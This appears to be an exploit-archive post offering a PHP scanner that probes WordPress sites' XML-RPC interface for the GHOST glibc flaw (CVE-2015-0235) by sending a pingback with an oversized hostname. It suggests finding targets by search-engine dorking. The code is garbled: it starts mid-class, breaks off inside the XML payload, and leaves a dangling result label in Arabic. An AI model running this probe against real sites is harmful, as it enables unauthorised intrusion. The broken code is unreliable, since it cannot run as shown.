=============================================================================================================================================
| # Title : WordPress 4.2.4 XMLRPC GHOST Vulnerability Scanner |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wordpress.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Standalone PHP code to scan WordPress for GHOST vulnerability using XML-RPC.
(linked: https://packetstorm.news/files/id/181060/ Linked CVE numbers: CVE-2015-0235),
[+] save code as poc.php.
[+] USage : http://127.0.0.1/poc.php
[+] PayLoad :
target = $target;
$this->length = $length;
}
public function isWordpress() {
$headers = @get_headers($this->target);
if (!$headers) return false;
foreach ($headers as $header) {
if (stripos($header, 'X-Pingback') !== false) {
return true;
}
}
return false;
}
public function isXmlrpcEnabled() {
$url = $this->target . "/xmlrpc.php";
$response = @file_get_contents($url);
return $response !== false && stripos($response, 'XML-RPC server accepts') !== false;
}
public function checkVulnerability() {
if (!$this->isWordpress()) {
return "هذا الموقع لا يستخدم ووردبريس.";
}
if (!$this->isXmlrpcEnabled()) {
return "الواجهة XMLRPC غير مفعلة على هذا الموقع.";
}
$ghost = str_repeat("0", $this->length);
$payload = "http://{$ghost}/test.php";
$xml = "
النتيجة:
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================